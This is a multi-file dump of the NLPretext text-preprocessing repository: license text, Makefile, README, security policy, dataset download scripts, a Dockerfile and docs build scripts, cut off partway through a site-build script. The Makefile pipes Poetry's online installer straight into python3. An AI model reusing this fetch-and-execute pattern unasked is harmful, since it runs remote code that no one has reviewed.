3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
© 2021 GitHub, Inc.
Terms
Privacy
Security
Status
Docs
Contact GitHub
Pricing
API
Training
Blog
About
================================================
FILE: Makefile
================================================
# Root Makefile for NLPretext: dependency install, style/safety checks,
# tests, and Docker image lifecycle.
SHELL := /usr/bin/env bash
# Default Docker image name and tag; override with IMAGE=... VERSION=...
IMAGE := nlpretext
VERSION := latest
# Appended to a check command to make its failure non-fatal.
NO_CHECK_FLAG = || true
# STRICT=1 makes every check fatal (empty flag); otherwise all checks are
# best-effort via NO_CHECK_FLAG.
ifeq ($(STRICT), 1)
POETRY_COMMAND_FLAG =
PIP_COMMAND_FLAG =
SAFETY_COMMAND_FLAG =
BANDIT_COMMAND_FLAG =
SECRETS_COMMAND_FLAG =
BLACK_COMMAND_FLAG =
DARGLINT_COMMAND_FLAG =
ISORT_COMMAND_FLAG =
MYPY_COMMAND_FLAG =
else
POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
# Per-tool overrides: <TOOL>_STRICT=1 forces that single check to be fatal,
# <TOOL>_STRICT=0 forces it to be best-effort, regardless of STRICT.
ifeq ($(POETRY_STRICT), 1)
POETRY_COMMAND_FLAG =
else ifeq ($(POETRY_STRICT), 0)
POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(PIP_STRICT), 1)
PIP_COMMAND_FLAG =
else ifeq ($(PIP_STRICT), 0)
PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(SAFETY_STRICT), 1)
SAFETY_COMMAND_FLAG =
else ifeq ($(SAFETY_STRICT), 0)
SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(BANDIT_STRICT), 1)
BANDIT_COMMAND_FLAG =
else ifeq ($(BANDIT_STRICT), 0)
BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(SECRETS_STRICT), 1)
SECRETS_COMMAND_FLAG =
else ifeq ($(SECRETS_STRICT), 0)
SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(BLACK_STRICT), 1)
BLACK_COMMAND_FLAG =
else ifeq ($(BLACK_STRICT), 0)
BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(DARGLINT_STRICT), 1)
DARGLINT_COMMAND_FLAG =
else ifeq ($(DARGLINT_STRICT), 0)
DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(ISORT_STRICT), 1)
ISORT_COMMAND_FLAG =
else ifeq ($(ISORT_STRICT), 0)
ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(MYPY_STRICT), 1)
MYPY_COMMAND_FLAG =
else ifeq ($(MYPY_STRICT), 0)
MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
# Install Poetry itself via the official installer script.
.PHONY: download-poetry
download-poetry:
curl -sSL https://install.python-poetry.org | python3 -
# Install project dependencies and (unless NO_PRE_COMMIT=1) the
# pre-commit / pre-push git hooks.
.PHONY: install
install:
poetry env use python3.10
poetry lock -n
poetry install -n
ifneq ($(NO_PRE_COMMIT), 1)
poetry run pre-commit install -t pre-commit -t pre-push
endif
# Dependency / security checks: poetry metadata, pip consistency,
# safety vulnerability scan, bandit static analysis.
.PHONY: check-safety
check-safety:
poetry check$(POETRY_COMMAND_FLAG) && \
poetry run pip check$(PIP_COMMAND_FLAG) && \
poetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \
poetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG)
# Scan recent commits for leaked secrets with gitleaks (runs in Docker).
.PHONY: gitleaks
gitleaks:
commits="$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))"; \
if [ "$${commits}" != "" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi;
# Run all configured pre-commit formatters/linters over the whole tree.
.PHONY: format-code
format-code:
poetry run pre-commit run --all
.PHONY: test
test:
poetry run pytest
# Aggregate target: safety checks, formatting, then tests.
.PHONY: lint
lint: check-safety format-code test
# Example: make docker VERSION=latest
# Example: make docker IMAGE=some_name VERSION=1.0.4
.PHONY: docker
docker:
@echo Building docker $(IMAGE):$(VERSION) ...
docker build \
-t $(IMAGE):$(VERSION) . \
-f ./docker/Dockerfile
# Example: make clean_docker VERSION=latest
# Example: make clean_docker IMAGE=some_name VERSION=1.0.4
.PHONY: clean_docker
clean_docker:
@echo Removing docker $(IMAGE):$(VERSION) ...
docker rmi -f $(IMAGE):$(VERSION)
# Remove local build artifacts.
.PHONY: clean_build
clean_build:
rm -rf build/
.PHONY: clean
clean: clean_build clean_docker
================================================
FILE: README.md
================================================
# NLPretext
[](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain)
[](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease)
[](#supported-python-versions)
[](https://github.com/artefactory/NLPretext/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot)
[](https://github.com/psf/black)
[](https://github.com/PyCQA/bandit)
[](https://github.com/artefactory/NLPretext/blob/main/.pre-commit-config.yaml)
[](https://github.com/artefactory/NLPretext/releases)
[](https://github.com/artefactory/NLPretext/tree/main/docs)
[](https://github.com/artefactory/NLPretext/blob/main/LICENSE)
All the goto functions you need to handle NLP use-cases, integrated in NLPretext
# TL;DR
> *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?* :tired_face:
> *Need to efficiently extract email addresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved:
**NLPretext got you covered!** :rocket:
NLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project.
:mag: Quickly explore below our preprocessing pipelines and individual functions referential.
* [Default preprocessing pipeline](#default_pipeline)
* [Custom preprocessing pipeline](#custom_pipeline)
* [Replacing phone numbers](#replace_phone_numbers)
* [Removing hashtags](#remove_hashtags)
* [Extracting emojis](#extract_emojis)
* [Data augmentation](#data_augmentation)
Cannot find what you were looking for? Feel free to open an [issue](https://github.com/artefactory/nlpretext/issues).
# Installation
### Supported Python Versions
- Main version supported : `3.8`
- Other supported versions : `3.9`, `3.10`
We strongly advise you to do the remaining steps in a virtual environment.
To install this library from PyPi, run the following command:
```bash
pip install nlpretext
```
or with `Poetry`
```bash
poetry add nlpretext
```
# Usage
## Default pipeline
Need to preprocess your text data but no clue about what function to use and in which order? The default preprocessing pipeline got you covered:
```python
from nlpretext import Preprocessor
text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
preprocessor = Preprocessor()
text = preprocessor.run(text)
print(text)
# "I just got the best dinner in my life!!! I recommend"
```
## Create your custom pipeline
Another possibility is to create your custom pipeline if you know exactly what function to apply on your data, here's an example:
```python
from nlpretext import Preprocessor
from nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters,
remove_stopwords, lower_text)
from nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji
text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
preprocessor = Preprocessor()
preprocessor.pipe(lower_text)
preprocessor.pipe(remove_mentions)
preprocessor.pipe(remove_hashtag)
preprocessor.pipe(remove_emoji)
preprocessor.pipe(remove_eol_characters)
preprocessor.pipe(remove_stopwords, args={'lang': 'en'})
preprocessor.pipe(remove_punct)
preprocessor.pipe(normalize_whitespace)
text = preprocessor.run(text)
print(text)
# "dinner life recommend"
```
Take a look at all the functions that are available [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext) in the ```preprocess.py``` scripts in the different folders: basic, social, token.
## Load text data
Pre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts contained in a local .txt, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and divided in multiple files. Hopefully, you can use NLPretext's TextLoader class to easily import text data.
While it is not mandatory, our TextLoader works best with Dask; make sure to have the library installed if you want the best performance.
```python
from nlpretext.textloader import TextLoader
files_path = "local_folder/texts/text.txt"
text_loader = TextLoader(use_dask=True)
text_dataframe = text_loader.read_text(files_path)
print(text_dataframe.text.values.tolist())
# ["I just got the best dinner in my life!!!", "I recommend", "It was awesome"]
```
File path can be provided as a string or a list of strings, with or without wildcards. It also supports imports from cloud providers, if your machine is authenticated on a project.
```python
text_loader = TextLoader(text_column="name_of_text_column_in_your_data")
local_file_path = "local_folder/texts/text.csv" # File from local folder
local_corpus_path = ["local_folder/texts/text_1.csv", "local_folder/texts/text_2.csv", "local_folder/texts/text_3.csv"] # Multiple files from local folder
gcs_file_path = "gs://my-bucket/texts/text.json" # File from GCS
s3_file_path = "s3://my-bucket/texts/text.json" # File from S3
hdfs_file_path = "hdfs://folder/texts/text.txt" # File from HDFS
azure_file_path = "az://my-bucket/texts/text.parquet" # File from Azure
gcs_corpus_path = "gs://my-bucket/texts/text_*.json" # Multiple files from GCS with wildcard
text_dataframe_1 = text_loader.read_text(local_file_path)
text_dataframe_2 = text_loader.read_text(local_corpus_path)
text_dataframe_3 = text_loader.read_text(gcs_file_path)
text_dataframe_4 = text_loader.read_text(s3_file_path)
text_dataframe_5 = text_loader.read_text(hdfs_file_path)
text_dataframe_6 = text_loader.read_text(azure_file_path)
text_dataframe_7 = text_loader.read_text(gcs_corpus_path)
```
You can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.
```python
text_loader = TextLoader(text_column="text_col")
preprocessor = Preprocessor()
local_file_path = "local_folder/texts/text.csv" # File from local folder
raw_text_dataframe = text_loader.read_text(local_file_path)
preprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor)
print(raw_text_dataframe.text_col.values.tolist())
# ["These texts are not preprocessed", "This is bad ## "]
print(preprocessed_text_dataframe.text_col.values.tolist())
# ["These texts are not preprocessed", "This is bad"]
```
## Individual Functions
### Replacing emails
```python
from nlpretext.basic.preprocess import replace_emails
example = "I have forwarded this email to obama@whitehouse.gov"
example = replace_emails(example, replace_with="*EMAIL*")
print(example)
# "I have forwarded this email to *EMAIL*"
```
### Replacing phone numbers
```python
from nlpretext.basic.preprocess import replace_phone_numbers
example = "My phone number is 0606060606"
example = replace_phone_numbers(example, country_to_detect=["FR"], replace_with="*PHONE*")
print(example)
# "My phone number is *PHONE*"
```
### Removing Hashtags
```python
from nlpretext.social.preprocess import remove_hashtag
example = "This restaurant was amazing #food #foodie #foodstagram #dinner"
example = remove_hashtag(example)
print(example)
# "This restaurant was amazing"
```
### Extracting emojis
```python
from nlpretext.social.preprocess import extract_emojis
example = "I take care of my skin 😀"
example = extract_emojis(example)
print(example)
# [':grinning_face:']
```
## Data augmentation
The augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library.
```python
from nlpretext.augmentation.text_augmentation import augment_text
example = "I want to buy a small black handbag please."
entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]
example = augment_text(example, method="wordnet_synonym", entities=entities)
print(example)
# "I need to buy a small black pocketbook please."
```
# 📈 Releases
You can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext/releases) page.
We follow [Semantic Versions](https://semver.org/) specification.
We use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you’re ready. With the categories option, you can categorize pull requests in release notes using labels.
For Pull Requests, these labels are configured, by default:
| **Label** | **Title in Releases** |
| :-----------------------------------: | :---------------------: |
| `enhancement`, `feature` | 🚀 Features |
| `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring |
| `build`, `ci`, `testing` | 📦 Build System & CI/CD |
| `breaking` | 💥 Breaking Changes |
| `documentation` | 📝 Documentation |
| `dependencies` | ⬆️ Dependencies updates |
GitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository, when needed.

## 🛡 License
[](https://github.com/artefactory/NLPretext/blob/main/LICENSE)
This project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext/blob/main/LICENSE) for more details.

## 📃 Citation
```
@misc{nlpretext,
author = {artefactory},
title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/artefactory/NLPretext}}
}
```
# Project Organization
------------
.
├── .github/workflows <- Where the CI and CD lives
├── datasets/external <- Bash scripts to download external datasets
├── docker <- All you need to build a Docker image from that package
├── docs <- Sphinx HTML documentation
├── nlpretext <- Main Package. This is where the code lives
│ ├── preprocessor.py <- Main preprocessing script
│ ├── text_loader.py <- Main loading script
│ ├── augmentation <- Text augmentation script
│ ├── basic <- Basic text preprocessing
│ ├── cli <- Command lines that can be used
│ ├── social <- Social text preprocessing
│ ├── token <- Token text preprocessing
│ ├── textloader <- File loading
│ ├── _config <- Where the configuration and constants live
│ └── _utils <- Where preprocessing utils scripts lives
├── references <- assets
├── tests <- Where the tests lives
├── .gitignore
├── .pre-commit-config.yaml <- Pre-commit configuration
├── CODE_OF_CONDUCT.md <- Code of conduct guidelines
├── CONTRIBUTING.md <- Contribution guidelines
├── LICENSE
├── Makefile
├── pyproject.toml <- Package build configuration
├── README.md <- The top-level README for developers using this project.
└── SECURITY.md
# Credits
- [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions:
- `fix_bad_unicode`
- `normalize_whitespace`
- `unpack_english_contractions`
- `replace_urls`
- `replace_emails`
- `replace_numbers`
- `replace_currency_symbols`
- `remove_punct`
- `remove_accents`
- `replace_phone_numbers` *(with some modifications of our own)*
================================================
FILE: SECURITY.md
================================================
# Security
## 🔐 Reporting Security Issues
> Do not open issues that might have security implications!
> It is critical that security related issues are reported privately so we have time to address them before they become public knowledge.
Vulnerabilities can be reported by emailing core members:
- artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com)
Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue:
- Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.)
- Full paths of source file(s) related to the manifestation of the issue
- The location of the affected source code (tag/branch/commit or direct URL)
- Any special configuration required to reproduce the issue
- Environment (e.g. Linux / Windows / macOS)
- Step-by-step instructions to reproduce the issue
- Proof-of-concept or exploit code (if possible)
- Impact of the issue, including how an attacker might exploit the issue
This information will help us triage your report more quickly.
## Preferred Languages
We prefer all communications to be in English.
================================================
FILE: datasets/external/get_language_dataset.sh
================================================
#!/bin/bash
# Fix: the shebang must be the very first line of the file to take effect;
# it previously appeared after the license header, where it is just a comment.
#
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

# Download the WiLI-2018 language identification dataset and unzip it
# into the wili/ directory. The URL is quoted so the shell does not
# treat the '?' in the query string as a glob character.
wget -O wili.zip "https://zenodo.org/record/841984/files/wili-2018.zip?download=1"
mkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd ..
================================================
FILE: datasets/external/get_stanfordtweets.sh
================================================
#!/bin/bash
# Fix: the shebang must be the very first line of the file to take effect;
# it previously appeared after the license header, where it is just a comment.
#
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

# Download the Stanford Sentiment140 tweets dataset and unzip it into the
# tweets_sentiment/ directory.
# Fix: the original command had a stray trailing "trainingandtestdata.zip"
# argument, which wget interprets as a second URL to fetch.
wget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip
mkdir -p tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip
================================================
FILE: docker/Dockerfile
================================================
# Runtime image for the nlpretext CLI, built on slim Python 3.10.
FROM python:3.10-slim-buster

# UTF-8 locale so text preprocessing handles non-ASCII input correctly.
ENV LANG=C.UTF-8 \
    LC_ALL=C.UTF-8

# curl/coreutils are needed by build tooling; clean apt lists to keep the image small.
RUN apt-get update && \
    apt-get install -y --no-install-recommends \
    curl coreutils \
    && rm -rf /var/lib/apt/lists/*

# Install Poetry
ENV POETRY_VERSION=1.5.1
RUN pip install --upgrade pip
RUN python3 -m pip install "poetry==$POETRY_VERSION"

WORKDIR /home/workspace

# Install dependencies first (only pyproject.toml) so Docker layer caching
# avoids re-resolving them on every source change.
COPY pyproject.toml ./
RUN poetry config virtualenvs.create false \
    && poetry lock \
    && poetry install --no-root --no-dev --no-interaction

# Fix: copy the sources into WORKDIR (/home/workspace). The original copied
# them to /home/docker_user/workspace/, which does not match WORKDIR, so the
# entrypoint ran in a directory that never received the package code.
COPY . /home/workspace/

ENTRYPOINT ["poetry", "run", "nlpretext"]
================================================
FILE: docker/README.md
================================================
# Docker for nlpretext
## Installation
To create Docker you need to run:
```bash
make docker
```
which is equivalent to:
```bash
make docker VERSION=latest
```
You could also provide name and version for the image itself.
Default name is `IMAGE := nlpretext`.
Default version is `VERSION := latest`.
```bash
make docker IMAGE=some_name VERSION=1.0.4
```
## Usage
```bash
docker run -it --rm \
-v $(pwd):/workspace \
nlpretext bash
```
## How to clean up
To uninstall docker image run `make clean_docker` with `VERSION`:
```bash
make clean_docker VERSION=1.0.4
```
like in installation, you can also choose the image name
```bash
make clean_docker IMAGE=some_name VERSION=latest
```
If you want to clean all, including `build` run `make clean`
================================================
FILE: docs/Makefile
================================================
# Minimal makefile for Sphinx documentation
#
# You can set these variables from the command line, and also
# from the environment for the first two.
SPHINXOPTS ?=
SPHINXBUILD ?= poetry run sphinx-build
SPHINXAPIBUILD ?= poetry run sphinx-apidoc
SPHINXMULTIVERSION ?= poetry run sphinx-multiversion
SOURCEDIR = source
BUILDDIR = build
# Put it first so that "make" without argument is like "make help".
.PHONY: help Makefile
help:
@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
# Build HTML docs for every tagged version/branch via sphinx-multiversion.
multiversion:
@$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html
# Regenerate the API reference .rst stubs from the nlpretext package,
# using the custom templates in source/_templates.
apidoc:
@$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates
# Catch-all target: route all unknown targets to Sphinx using the new
# "make mode" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).
%: Makefile
@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
================================================
FILE: docs/make.bat
================================================
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^` where ^ is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. changes to make an overview over all changed/added/deprecated items
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Mapnik.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Mapnik.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
:end
================================================
FILE: docs/scripts/buildsite.sh
================================================
#!/bin/bash
# Build the multi-version Sphinx documentation and publish it to the
# gh-pages branch. Intended to be run from the repository root (e.g. in CI).
# Reproducible builds: timestamp embedded in output = last commit time.
export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)
##############
# BUILD DOCS #
##############
# Python Sphinx, configured with source/conf.py
# See https://www.sphinx-doc.org/
cd docs/
# Current branch name, or the exact tag when in detached-HEAD state.
current_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match)
# Annotation message of the last tag listed by `git tag -l`
